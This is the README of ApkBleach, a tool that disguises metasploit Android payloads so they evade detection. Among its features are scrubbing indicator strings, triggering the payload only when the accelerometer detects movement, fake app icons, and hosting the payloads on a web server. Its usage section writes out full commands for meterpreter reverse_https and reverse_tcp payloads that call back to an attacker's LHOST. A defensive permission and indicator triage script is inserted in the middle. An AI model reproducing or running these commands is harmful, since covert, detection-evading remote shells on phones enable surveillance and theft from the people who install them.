ApkBleach was developed specifically to obfuscate Android payloads generated by the metasploit-framework in an attempt to evade detection. The obfuscation uses two main methods. The first method targets screening of the decompiled payload: by default metasploit generates an Android application littered with the keywords "metasploit" and "payload", so replacing those keywords with random strings and randomizing file names is a good first step in obfuscating the typical metasploit Android payload. The second method changes the way the payload is executed. The default payload generated by metasploit executes in onCreate, or simply put, as soon as the application is opened.
This obfuscation method uses the device's accelerometer activity to launch the payload instead, so the apkbleach payload will wait for physical movement of the target device before executing.
This software also automates the process of changing the app icon, changing the app name, signing the apk, aligning the apk, and installing or upgrading apktool.
New Deployment UI feature
Features
- User interface for deployment of payloads
- Line by line permissions editing. The software goes through each permission in the manifest and asks if you want to delete it.
- Stealth option. This executes the payload off the device's accelerometer instead of on open. This option also lets you choose how many sessions of the exploit you want spawned.
- Custom icon injection. This lets you modify the app icon that appears on the home screen of an Android device. You can choose from an icon apkbleach provides or supply your own; apkbleach does all the work for you.
- Renames the application to the name you chose as the output file.
- Scrubs the entire application of any mention of the names "metasploit", "stage" or "payload". There are a lot, by the way. Sending a security test with an app that contains the name metasploit is just funny 🙂
- Adds pad-nops to the PAYLOAD.
- Signs the apk with jarsigner. msfvenom produces unsigned apps.
- Zip-aligns the apk.
- Apktool upgrade feature. If the software detects you're using apktool version 2.4.1-dirty, which is Kali's package maintainer's version, it will ask if you want to replace it with the latest version from iBotPeaches. This is a good idea because that version conflicts with the msfvenom -x option and throws a version number error, not to mention the problems it has given users in the past.
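The permission-editing and keyword-scrubbing features above describe exactly the two things a reviewer checks first when triaging an unknown apk: which permissions the manifest requests and whether the decompiled code still carries the default metasploit strings. The script below is an added example, not ApkBleach code or msfvenom output; it assumes apktool-decoded text (an AndroidManifest.xml and a smali file) and uses constructed sample inputs so it runs offline.

```python
"""Static triage of an apktool-decoded Android app (added example, not ApkBleach code):
list manifest permissions, flag dangerous ones, and scan smali text for the default
metasploit indicator strings the README says get scrubbed."""
import re
import xml.etree.ElementTree as ET

# Namespace apktool emits for android:* attributes in a decoded manifest.
ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifest; the package name and permissions are made up.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sample">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <application android:label="@string/app_name"/>
</manifest>
"""

# Constructed smali fragment containing the indicator strings named in the README.
SAMPLE_SMALI = """.class public Lcom/metasploit/stage/Payload;
.super Ljava/lang/Object;
.method public static start(Landroid/content/Context;)V
    const-string v0, "payload"
    return-void
.end method
"""

# A subset of Android's "dangerous" protection-level permissions a reviewer questions.
DANGEROUS = {
    "android.permission.RECORD_AUDIO", "android.permission.CAMERA",
    "android.permission.READ_SMS", "android.permission.SEND_SMS",
    "android.permission.READ_CONTACTS", "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.READ_CALL_LOG", "android.permission.READ_EXTERNAL_STORAGE",
}

# The three names the README says ApkBleach scrubs; their presence means no scrubbing.
INDICATORS = re.compile(r"metasploit|payload|stage", re.IGNORECASE)


def manifest_permissions(xml_text):
    """Return the <uses-permission> names in manifest order."""
    root = ET.fromstring(xml_text)
    return [el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")]


def flag_dangerous(permissions):
    """Return the sorted subset of permissions that are in the dangerous set."""
    return sorted(p for p in permissions if p in DANGEROUS)


def indicator_hits(smali_text):
    """Return (line_number, line) pairs whose text contains an indicator string."""
    return [(n, line.strip()) for n, line in enumerate(smali_text.splitlines(), 1)
            if INDICATORS.search(line)]


def triage(xml_text, smali_text):
    """Run both checks and return a small report dict."""
    perms = manifest_permissions(xml_text)
    return {
        "permissions": perms,
        "dangerous": flag_dangerous(perms),
        "indicator_lines": [n for n, _ in indicator_hits(smali_text)],
    }


if __name__ == "__main__":
    report = triage(SAMPLE_MANIFEST, SAMPLE_SMALI)
    print(f"permissions requested: {len(report['permissions'])}")
    for perm in report["dangerous"]:
        print(f"  dangerous: {perm}")
    for num, line in indicator_hits(SAMPLE_SMALI):
        print(f"  indicator at smali line {num}: {line}")
```

Against a real decoded app, point manifest_permissions at the decoded AndroidManifest.xml and run indicator_hits over every .smali file under the smali/ tree; an app whose manifest requests several dangerous permissions with no matching UI, or whose smali still names com/metasploit/stage, is the case these features were written to hide.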
Usage
apkbleach -g android/meterpreter/reverse_https LHOST=Address LPORT=port -s 3 -i BLEACH_settings --edit-permissions -o /var/www/html/payload.apk
apkbleach -g android/meterpreter/reverse_tcp LHOST=address LPORT=port -s 3 --edit-permissions --deploy-all
apkbleach --list-payloads
apkbleach --list-icons
apkbleach --clear-cache
optional arguments:
-h, --help
    Show this help message and exit
-g [PAYLOAD] [LHOST] [LPORT]
    Generates a payload
-s [number of sessions to spawn 1-5]
    Executes the payload on accelerometer activity instead of on open
-i [BLEACH_icon..] or [path/to/custom/icon]
    Injects an icon
-o [output/path/for/file.apk]
    Path to the output apk
--edit-permissions
    Enables permission editing in the apk's manifest
--deploy-all
    Deploys each available icon as a payload on the apache2 server with a web interface
--list-payloads
    Lists available payloads
--list-icons
    Lists available icons
--clear-cache
    Allows the prompt asking whether to keep the package maintainer's version of apktool
Install
Install instructions:
After cloning or downloading the repository, cd into the apkbleach directory and run install.sh:
cd apkbleach
bash install.sh
or
cd apkbleach
chmod +x install.sh
./install.sh
Demo Video
ApkBleach by graylagx2
Android payload obfuscation and icon injection tool